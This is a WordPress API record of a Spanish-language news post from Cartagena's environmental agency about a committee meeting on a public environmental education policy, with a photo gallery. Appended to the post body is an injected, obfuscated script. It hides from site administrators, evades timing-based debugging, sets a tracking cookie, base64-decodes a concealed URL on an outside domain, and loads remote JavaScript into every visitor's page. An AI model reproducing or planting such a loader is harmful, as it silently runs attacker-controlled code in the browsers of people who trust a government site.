{"id":29176,"date":"2025-08-12T16:58:47","date_gmt":"2025-08-12T21:58:47","guid":{"rendered":"https:\/\/epacartagena.gov.co\/web\/?p=29176"},"modified":"2025-10-28T23:50:07","modified_gmt":"2025-10-29T04:50:07","slug":"cartagena-avanza-en-la-construccion-de-la-politica-publica-de-educacion-ambiental-a-traves-del-cidea","status":"publish","type":"post","link":"https:\/\/epacartagena.gov.co\/web\/cartagena-avanza-en-la-construccion-de-la-politica-publica-de-educacion-ambiental-a-traves-del-cidea\/","title":{"rendered":"Cartagena avanza en la construcci\u00f3n de la Pol\u00edtica P\u00fablica de Educaci\u00f3n Ambiental a trav\u00e9s del CIDEA"},"content":{"rendered":"\n<p>Cartagena de Indias D. T. y C., 12 de agosto de 2025. Con masiva asistencia se realiz\u00f3 la primera sesi\u00f3n ordinaria del Comit\u00e9 Interinstitucional de Educaci\u00f3n Ambiental (CIDEA) 2025, en cabeza del Establecimiento P\u00fablico Ambiental EPA Cartagena y la Secretar\u00eda de Educaci\u00f3n Distrital quienes est\u00e1n a cargo de la secretaria t\u00e9cnica y la coordinaci\u00f3n del comit\u00e9 respectivamente.<\/p>\n\n\n\n<p>Este espacio que promueve la participaci\u00f3n ciudadana e institucional, busca establecer de forma conjunta, las necesidades ambientales de los territorios como base del trabajo intersectorial, que aporten en la construcci\u00f3n de la Pol\u00edtica P\u00fablica de Educaci\u00f3n Ambiental.<\/p>\n\n\n\n<p>Mauricio Rodr\u00edguez, director del EPA Cartagena, destac\u00f3 como aspecto importante la Contextualizaci\u00f3n y avances en la formulaci\u00f3n de la Pol\u00edtica P\u00fablica de Educaci\u00f3n Ambiental, una meta clave del Plan de Desarrollo Cartagena Ciudad de Derechos, la cual se est\u00e1 liderando desde esta entidad, articulados con el CIDEA.<\/p>\n\n\n\n<p>La PPEA se formular\u00e1 siguiendo las directrices del ciclo de Pol\u00edticas P\u00fablicas CONPES mediante (Decreto 0730 de 2023). Este ciclo describe las etapas para la formulaci\u00f3n, implementaci\u00f3n y evaluaci\u00f3n de las Pol\u00edticas P\u00fablicas del distrito; cada etapa es una herramienta \u00fatil para entender y mejorar el proceso de toma de decisiones en el gobierno, ya que permite identificar los problemas, posibles soluciones, implementar acciones y evaluar los resultados obtenidos de manera sistem\u00e1tica y eficiente. El ciclo de pol\u00edticas p\u00fablicas, es una secuencia de etapas iterativas que permite gestionar el dise\u00f1o y formulaci\u00f3n, implementaci\u00f3n, monitoreo y evaluaci\u00f3n de las pol\u00edticas p\u00fablicas.<\/p>\n\n\n\n<p>Para la construcci\u00f3n y formulaci\u00f3n de esta pol\u00edtica tambi\u00e9n se tendr\u00e1n en cuenta los lineamientos establecidos en la Pol\u00edtica Nacional de Educaci\u00f3n Ambiental, abarcando los \u00e1mbitos formal, no formal e informal. Dichos lineamientos deber\u00e1n contextualizarse y adecuarse a las particularidades territoriales del Distrito de Cartagena, caracterizado por una amplia diversidad de ecosistemas que comprenden zonas continentales, marinas, submarinas y costeras, en coherencia con su ubicaci\u00f3n geogr\u00e1fica.<\/p>\n\n\n\n<p>Los asistentes pudieron conocer los avances que se tienen de cara a la formulaci\u00f3n y se comprometieron en generar los aportes necesarios para el avance de la misma \u201cme parece esta reuni\u00f3n muy importante que hemos tenido de CIDEA, con los diferentes entes y organizaciones que estamos aportando en este proceso,&nbsp; para que se de una pol\u00edtica ambiental que la ciudad est\u00e1 necesitando, para que se de una cultura ambiental que pueda ayudar a preservar nuestros recursos y a solucionar problem\u00e1ticas ambientales\u201d, manifest\u00f3 Mar\u00eda del Socorro Simanca representante de la Universidad Nacional Abierta y a Distancia UNAD.&nbsp;<\/p>\n\n\n\n<p>Esta reuni\u00f3n cont\u00f3 con la participaci\u00f3n de entidades del Distrito, el sector privado, la academia, instituciones educativas, empresas de aseo, l\u00edderes comunitarios, entre otros actores claves en la materializaci\u00f3n de la pol\u00edtica.<\/p>\n\n\n\n<p>Para la ciudad es oportuno la generaci\u00f3n de estrategias que orienten y articulen los procesos de educaci\u00f3n ambiental implementados por la sociedad civil como por los sectores p\u00fablico y privado. Estableciendo roles espec\u00edficos que, con respeto de la diversidad y autonom\u00eda, puedan fundamentar la corresponsabilidad en aras del mejoramiento de las condiciones ambientales del Distrito, a trav\u00e9s de la Pol\u00edtica P\u00fablica de Educaci\u00f3n Ambiental del Distrito de Cartagena, se espera la implementaci\u00f3n de mecanismos, herramientas y estrategias pertinentes y acertadas para la transformaci\u00f3n educativa ambiental de la ciudad, haciendo hincapi\u00e9 en la acci\u00f3n efectiva y eficaz del Estado, el sector privado y la sociedad civil.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"29184\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.43-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-29184\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.43-PM-1024x768.jpeg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.43-PM-300x225.jpeg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.43-PM-768x576.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.43-PM-1536x1152.jpeg 1536w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.43-PM-500x375.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.43-PM-800x600.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.43-PM-1280x960.jpeg 1280w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.43-PM.jpeg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"29177\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1-1024x576.jpeg\" alt=\"\" class=\"wp-image-29177\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1-1024x576.jpeg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1-300x169.jpeg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1-768x432.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1-1536x864.jpeg 1536w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1-500x281.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1-800x450.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1-1280x720.jpeg 1280w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1.jpeg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"29183\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-2-1024x768.jpeg\" alt=\"\" class=\"wp-image-29183\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-2-1024x768.jpeg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-2-300x225.jpeg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-2-768x576.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-2-1536x1152.jpeg 1536w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-2-500x375.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-2-800x600.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-2-1280x960.jpeg 1280w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-2.jpeg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"29178\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-29178\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1024x576.jpeg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-300x169.jpeg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-768x432.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1536x864.jpeg 1536w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-500x281.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-800x450.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM-1280x720.jpeg 1280w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.44-PM.jpeg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"29179\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1-1024x576.jpeg\" alt=\"\" class=\"wp-image-29179\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1-1024x576.jpeg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1-300x169.jpeg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1-768x432.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1-1536x864.jpeg 1536w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1-500x281.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1-800x450.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1-1280x720.jpeg 1280w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1.jpeg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"29181\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-2-1024x576.jpeg\" alt=\"\" class=\"wp-image-29181\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-2-1024x576.jpeg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-2-300x169.jpeg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-2-768x432.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-2-1536x864.jpeg 1536w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-2-500x281.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-2-800x450.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-2-1280x720.jpeg 1280w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-2.jpeg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"29182\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-29182\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1024x576.jpeg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-300x169.jpeg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-768x432.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1536x864.jpeg 1536w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-500x281.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-800x450.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM-1280x720.jpeg 1280w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.45-PM.jpeg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"29180\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.46-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-29180\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.46-PM-1024x576.jpeg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.46-PM-300x169.jpeg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.46-PM-768x432.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.46-PM-1536x864.jpeg 1536w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.46-PM-500x281.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.46-PM-800x450.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.46-PM-1280x720.jpeg 1280w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/08\/WhatsApp-Image-2025-08-12-at-4.50.46-PM.jpeg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>Cartagena de Indias D. T. y C., 12 de agosto de 2025. Con masiva asistencia se realiz\u00f3 la primera sesi\u00f3n ordinaria del Comit\u00e9 Interinstitucional de Educaci\u00f3n Ambiental (CIDEA) 2025, en cabeza del Establecimiento P\u00fablico Ambiental EPA Cartagena y la Secretar\u00eda de Educaci\u00f3n Distrital quienes est\u00e1n a cargo de la secretaria t\u00e9cnica y la coordinaci\u00f3n del&#8230;<\/p>\n","protected":false},"author":2,"featured_media":29184,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"_kad_post_classname":"","_vp_format_video_url":"","_vp_image_focal_point":[],"footnotes":""},"categories":[15,7],"tags":[],"class_list":["post-29176","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-la-entidad","category-noticias"],"acf":[],"_links":{"self":[{"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/posts\/29176","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/comments?post=29176"}],"version-history":[{"count":2,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/posts\/29176\/revisions"}],"predecessor-version":[{"id":31897,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/posts\/29176\/revisions\/31897"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/media\/29184"}],"wp:attachment":[{"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/media?parent=29176"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/categories?post=29176"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/tags?post=29176"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}